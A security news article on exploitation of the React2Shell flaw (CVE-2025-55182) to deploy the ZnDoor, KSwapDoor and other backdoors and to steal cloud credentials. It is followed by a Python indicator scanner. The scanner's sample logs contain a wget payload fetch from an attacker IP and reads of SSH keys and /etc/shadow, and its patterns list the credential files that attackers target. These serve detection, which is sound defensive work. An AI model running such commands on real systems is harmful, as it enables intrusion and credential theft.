React2Shell Vulnerability Actively Exploited to Deploy Linux Backdoors

By News Room, published 16 December 2025 (last updated 2025/12/16 at 4:03 AM)

The security vulnerability known as React2Shell is being exploited by threat actors to deliver malware families like KSwapDoor and ZnDoor, according to findings from Palo Alto Networks Unit 42 and NTT Security.

“KSwapDoor is a professionally engineered remote access tool designed with stealth in mind,” Justin Moore, senior manager of threat intel research at Palo Alto Networks Unit 42, said in a statement.

“It builds an internal mesh network, allowing compromised servers to talk to each other and evade security blocks. It uses military-grade encryption to hide its communications and, most alarmingly, features a ‘sleeper’ mode that lets attackers bypass firewalls by waking the malware up with a secret, invisible signal.”

The cybersecurity company noted that KSwapDoor had previously been misclassified as BPFDoor, adding that the Linux backdoor offers an interactive shell, command execution, file operations, and scanning for lateral movement. It also impersonates a legitimate Linux kernel swap daemon to evade detection.

In a related development, NTT Security said organizations in Japan are being targeted by cyber attacks exploiting React2Shell to deploy ZnDoor, a malware family assessed to have been present in the wild since December 2023. The attack chains involve running a bash command that fetches the payload from a remote server (45.76.155[.]14) using wget and executes it.

ZnDoor is a remote access trojan that contacts the same threat actor-controlled infrastructure to receive commands and execute them on the host. Some of the supported commands are listed below:

  • shell, to execute a command
  • interactive_shell, to launch an interactive shell
  • explorer, to get a list of directories
  • explorer_cat, to read and display a file
  • explorer_delete, to delete a file
  • explorer_upload, to download a file from the server
  • explorer_download, to send files to the server
  • system, to gather system information
  • change_timefile, to change the timestamp of a file
  • socket_quick_startstreams, to start a SOCKS5 proxy
  • start_in_port_forward, to start port forwarding
  • stop_in_port, to stop port forwarding

The disclosure comes as the vulnerability, tracked as CVE-2025-55182 (CVSS score: 10.0), has been exploited by multiple threat actors, with Google identifying at least five China-nexus groups that have weaponized it to deliver an array of payloads:

  • UNC6600 to deliver a tunneling utility named MINOCAT
  • UNC6586 to deliver a downloader named SNOWLIGHT
  • UNC6588 to deliver a backdoor named COMPOOD
  • UNC6603 to deliver an updated version of a Go backdoor named HISONIC that uses Cloudflare Pages and GitLab to retrieve encrypted configuration and blend in with legitimate network activity
  • UNC6595 to deliver a Linux version of ANGRYREBEL (aka Noodle RAT)

Microsoft, in its own advisory for CVE-2025-55182, said threat actors have taken advantage of the flaw to run arbitrary commands for post-exploitation, including setting up reverse shells to known Cobalt Strike servers, and then dropping remote monitoring and management (RMM) tools such as MeshAgent, modifying the authorized_keys file, and enabling root login.

Some of the payloads delivered in these attacks include VShell, EtherRAT, SNOWLIGHT, ShadowPad, and XMRig. The attacks are also characterized by the use of Cloudflare Tunnel endpoints (“*.trycloudflare.com”) to evade security defenses, as well as conducting reconnaissance of the compromised environments to facilitate lateral movement and credential theft.

The credential harvesting activity, the Windows maker said, targeted the Instance Metadata Service (IMDS) endpoints of Azure, Amazon Web Services (AWS), Google Cloud Platform (GCP), and Tencent Cloud, with the end goal of acquiring identity tokens to burrow deeper into cloud infrastructure.

“Attackers also deployed secret discovery tools such as TruffleHog and Gitleaks, along with custom scripts to extract several different secrets,” the Microsoft Defender Security Research Team said. “Attempts to harvest AI and cloud-native credentials, such as OpenAI API keys, Databricks tokens, and Kubernetes service-account credentials, were also observed. Azure Command-Line Interface (CLI) (az) and Azure Developer CLI (azd) were also used to obtain tokens.”

In another campaign detailed by Beelzebub, threat actors have been observed exploiting flaws in Next.js, including CVE-2025-29927 and CVE-2025-66478 (an identifier assigned to the same React2Shell bug before it was rejected as a duplicate), to systematically extract credentials and sensitive data:

  • .env, .env.local, .env.production, .env.development
  • System environment variables (printenv, env)
  • SSH keys (~/.ssh/id_rsa, ~/.ssh/id_ed25519, /root/.ssh/*)
  • Cloud credentials (~/.aws/credentials, ~/.docker/config.json)
  • Git credentials (~/.git-credentials, ~/.gitconfig)
  • Command history (last 100 commands from ~/.bash_history)
  • System files (/etc/shadow, /etc/passwd)

The malware also establishes persistence on the host to survive system reboots, installs a SOCKS5 proxy, opens a reverse shell to “67.217.57[.]240:888,” and installs a React scanner that probes the internet for further propagation.

The activity, codenamed Operation PCPcat, is estimated to have already breached 59,128 servers. “The campaign shows characteristics of large-scale intelligence operations and data exfiltration on an industrial scale,” the Italian company said.
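As an added example (not code from the article or from any of the vendors it cites), the following Python scanner matches host and network log lines against the indicators the article publishes: the ZnDoor payload host, the Operation PCPcat reverse-shell address, trycloudflare.com tunnel hostnames, and the credential files PCPcat collects. The sample log lines are constructed for illustration, and the auditd/DNS/conntrack-style field names are assumed.

```python
import re

# Network indicators quoted in the article, kept defanged as published.
ARTICLE_IOCS = {
    "ZnDoor payload host": "45.76.155[.]14",
    "PCPcat reverse shell": "67.217.57[.]240:888",
}
# Credential material the article says Operation PCPcat collects.
SENSITIVE_PATH_RE = re.compile(
    r"(?:^|[\s/\"'=])\.env(?:\.(?:local|production|development))?\b"
    r"|/\.ssh/id_(?:rsa|ed25519)\b|/\.aws/credentials\b|/\.docker/config\.json\b"
    r"|/\.git-credentials\b|/\.gitconfig\b|/\.bash_history\b|/etc/(?:shadow|passwd)\b"
)
# Cloudflare Tunnel quick-tunnel hostnames ("*.trycloudflare.com").
TRYCLOUDFLARE_RE = re.compile(r"\b[\w-]+\.trycloudflare\.com\b")

def refang(ioc: str) -> str:
    """Turn a defanged indicator (45.76.155[.]14) back into a matchable string."""
    return ioc.replace("[.]", ".")

def classify(line: str) -> list[str]:
    """Return the names of every article indicator the log line matches."""
    hits = []
    for name, ioc in ARTICLE_IOCS.items():
        # (?!\d) keeps 45.76.155.14 from also matching 45.76.155.140.
        if re.search(re.escape(refang(ioc)) + r"(?!\d)", line):
            hits.append(name)
    if TRYCLOUDFLARE_RE.search(line):
        hits.append("Cloudflare Tunnel endpoint")
    if SENSITIVE_PATH_RE.search(line):
        hits.append("credential file access")
    return hits

def scan(lines):
    """(1-based line number, hits) for every line that matches at least one indicator."""
    return [(n, hits) for n, line in enumerate(lines, 1) if (hits := classify(line))]

# Constructed sample telemetry (not real logs); auditd/DNS/conntrack-style fields are assumed.
SAMPLE_LOG = [
    '2025-12-16T03:58:01Z host1 auditd: exe=/usr/bin/wget cmd="wget http://45.76.155.14/x -O /tmp/x"',
    '2025-12-16T03:58:05Z host1 auditd: exe=/bin/cat cmd="cat /root/.ssh/id_rsa /etc/shadow"',
    "2025-12-16T03:58:09Z host1 dns: query=spring-river-1a2b.trycloudflare.com type=A",
    "2025-12-16T03:58:12Z host1 conntrack: new tcp src=10.0.0.5 dst=67.217.57.240:888",
    '2025-12-16T03:58:20Z host1 auditd: exe=/usr/bin/node cmd="node server.js"',
]

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(hits)}")
```

A match on the credential-path rule alone is only a lead, since legitimate tooling reads `.env` files too; the network indicators are the higher-confidence signals here.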

The Shadowserver Foundation is currently tracking over 111,000 IP addresses vulnerable to React2Shell attacks, with over 77,800 instances in the U.S., followed by Germany (7,500), France (4,000), and India (2,300). Data from GreyNoise shows that there are 547 malicious IP addresses from the U.S., India, the U.K., Singapore, and the Netherlands partaking in the exploitation efforts over the past 24 hours.
